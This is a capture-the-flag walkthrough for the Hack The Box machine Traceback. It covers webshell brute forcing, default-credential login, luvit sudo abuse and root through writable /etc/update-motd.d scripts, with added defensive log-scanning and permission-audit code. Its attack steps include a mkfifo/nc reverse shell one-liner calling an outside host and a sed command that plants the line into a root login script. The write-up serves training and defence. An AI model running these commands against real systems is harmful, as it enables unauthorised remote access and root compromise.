HTB Traceback — Walkthrough

Vaibhav Joshi
Jun 14, 2021

ENUMERATION

Let's start enumeration with an nmap scan:

$ nmap -A 10.10.10.181
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us

Apache is running on port 80. Visiting the site shows text saying that a backdoor has been left:

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -

When I checked the page source there was a comment:

<!--Some of the best web shells that you might need ;)-->

It reminded me of the web shells by TheBinitGhimire, but to confirm I searched this comment on Google and found that the machine creator Xh4H has forked the Web-Shells repository by TheBinitGhimire.

I made a wordlist containing the names of all the shells:

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

And started directory brute forcing with this list:

# dirsearch.py -u http://10.10.10.181 -w list -e /

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: / | HTTP method: get | Threads: 10 | Wordlist size: 16
Error Log: /root/tools/dirsearch/logs/errors-20-04-28_23-54-08.log
Target: http://10.10.10.181

[23:54:08] Starting:
[23:54:10] 200 - 1KB - /smevk.php
Task Completed
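From the defender's side, a brute force like the dirsearch run above leaves a burst of requests for known shell filenames in the Apache access log. The following is an added example (not part of the original walkthrough) that scans combined-format log lines for the shell names listed above and flags clients that probed several of them; the log lines are constructed, not taken from the box.

```python
import re

# Filenames from the forked Web-Shells repository (the wordlist above).
WEBSHELL_NAMES = {
    "alfa3.php", "alfav3.0.1.php", "andela.php", "bloodsecv4.php", "by.php",
    "c99ud.php", "cmd.php", "configkillerionkros.php", "jspshell.jsp",
    "mini.php", "obfuscated-punknopass.php", "punk-nopass.php",
    "punkholic.php", "r57.php", "smevk.php", "wso2.8.5.php",
}

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def webshell_hits(log_lines):
    """Return (ip, path, status) for every request whose basename is a known shell."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]          # drop the query string
        basename = path.rsplit("/", 1)[-1].lower()
        if basename in WEBSHELL_NAMES:
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits

def probe_sources(hits, min_paths=3):
    """IPs that asked for several distinct shell names: a directory brute force, not a stray hit."""
    by_ip = {}
    for ip, path, _ in hits:
        by_ip.setdefault(ip, set()).add(path)
    return sorted(ip for ip, paths in by_ip.items() if len(paths) >= min_paths)

# Constructed sample log lines (hypothetical clients and timestamps).
SAMPLE_LOG = [
    '10.10.14.55 - - [28/Apr/2020:23:54:10 +0000] "GET /alfa3.php HTTP/1.1" 404 275 "-" "dirsearch"',
    '10.10.14.55 - - [28/Apr/2020:23:54:10 +0000] "GET /cmd.php HTTP/1.1" 404 275 "-" "dirsearch"',
    '10.10.14.55 - - [28/Apr/2020:23:54:10 +0000] "GET /smevk.php HTTP/1.1" 200 1261 "-" "dirsearch"',
    '10.10.14.60 - - [28/Apr/2020:23:55:01 +0000] "POST /smevk.php?a=cmd HTTP/1.1" 200 1261 "-" "Mozilla/5.0"',
    '10.10.14.61 - - [28/Apr/2020:23:55:30 +0000] "GET /index.html HTTP/1.1" 200 1113 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = webshell_hits(SAMPLE_LOG)
    print("shell requests:", hits, "\nbrute-force sources:", probe_sources(hits))
```

A 200 for a shell name that the site never deployed is the line to alert on; the 404s around it show the wordlist being walked.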

Initial Shell

I found that smevk.php was deployed there with the default credentials admin:admin, so I logged in, executed a command and found that the current user is webadmin.

To get a reverse shell, I submitted the following payload in the execute-command form, with an nc listener waiting on my machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f

# nc -lvp 443

Privilege Escalation — sysadmin

Inside /home/sysadmin I found a note.txt with the following text:

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Then, on checking sudo permissions, I found that webadmin may run one binary as sysadmin without a password:

(sysadmin) NOPASSWD: /home/sysadmin/luvit

Since luvit is a Lua runtime and Lua's os.execute can run a system command, I created a Lua script and executed it through sudo to get a sysadmin shell:

$ echo 'os.execute("bash")' > test.lua
$ sudo -u sysadmin /home/sysadmin/luvit test.lua

user.txt = daad8c6ce76b80********ba5b5817e5

Privilege Escalation — root

During enumeration I found some writable files inside the /etc/update-motd.d/ directory, which is a very good sign: the scripts in that directory are executed as root whenever a user logs into the system. So if there is a file named test in that directory, the following command will run as root when a user logs in or SSHes into the box:

$ /bin/sh test

But the problem is that a cron job keeps replacing the files inside /etc/update-motd.d/ with copies kept at another location where the files are not writable, so we need to be quick.

Also, if we append our reverse shell command at the end of any of the files it will not be executed, because none of the scripts run through to their last line, and if we completely overwrite a file with our payload (for example using > with echo) the file will not be executed either.
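The defender-side check for this weakness, as an added example that is not the author's exploit or any script from the box: it audits a directory playing the role of /etc/update-motd.d for scripts that a non-root user could modify. The sample directory, its file names and their modes are constructed here, and the current user stands in for root because a demo cannot chown files to root.

```python
import os
import stat
import tempfile

MOTD_DIR = "/etc/update-motd.d"

def audit_motd_dir(path=MOTD_DIR, trusted_uids=(0,)):
    """Return (name, reason) findings for scripts that someone other than root could tamper with.

    Every script here runs as root at each login, so a group- or world-writable
    script, or one owned by an untrusted uid, is a root escalation path.
    """
    findings = []
    dir_st = os.lstat(path)
    if dir_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((".", "directory is group/world writable: new scripts can be dropped in"))
    if dir_st.st_uid not in trusted_uids:
        findings.append((".", f"directory owned by uid {dir_st.st_uid}, not a trusted uid"))
    for name in sorted(os.listdir(path)):
        st = os.lstat(os.path.join(path, name))
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink: target may be writable elsewhere"))
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((name, "group writable"))
        if st.st_uid not in trusted_uids:
            findings.append((name, f"owned by uid {st.st_uid}, not a trusted uid"))
    return findings

def build_sample_dir():
    """Constructed stand-in for /etc/update-motd.d: one sound script and two weak ones."""
    d = tempfile.mkdtemp(prefix="motd-audit-")
    for name, mode in (("00-header", 0o755), ("50-motd-news", 0o775), ("91-release-upgrade", 0o777)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, mode)
    os.chmod(d, 0o755)
    return d

def audit_sample():
    """Audit the constructed directory, treating the current user as the trusted owner."""
    return audit_motd_dir(build_sample_dir(), trusted_uids=(os.getuid(),))

if __name__ == "__main__":
    for name, reason in audit_sample():
        print(f"{name}: {reason}")
```

The fix on a real host is root ownership and mode 0755 on the directory and every script, which is what the box's restoring cron job was imitating.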

I generated an SSH key pair with ssh-keygen on my host machine and then inserted the public key into the server:

# ssh-keygen
# cat id_rsa.pub
# copy the full text
$ echo "{id_rsa.pub content}" > /home/sysadmin/.ssh/authorized_keys

I wrote my code into /etc/update-motd.d/91-release-upgrade with nano, after which the file content looks like this:

#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f   # payload
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

Then I started an nc listener on my end and SSHed into the box with the private key generated before:

# nc -lvp 443
# ssh -i id_rsa sysadmin@10.10.10.181

This needs to be quick, otherwise our payload file will be replaced by the cron job.

As I failed many times because editing with nano was taking too long, I used a sed command instead:

$ sed "/sh/a rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f" /etc/update-motd.d/91-release-upgrade > /etc/update-motd.d/50-motd-news

Dividing it into parts:

  • /sh/a appends my code after the first line matching sh, that is, on the second line, right after #!/bin/sh
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f is the reverse shell payload which I am inserting into the code
  • /etc/update-motd.d/91-release-upgrade is the file containing the original code
  • /etc/update-motd.d/50-motd-news is another file at the same location which is also executed on login, so I overwrite it with the result, because with sed I cannot write the content back into 91-release-upgrade

Then SSH into the box and get the reverse shell.

I also created a Python exploit to automate the exploitation; the link is here.

To get more information about update-motd.d, visit here.
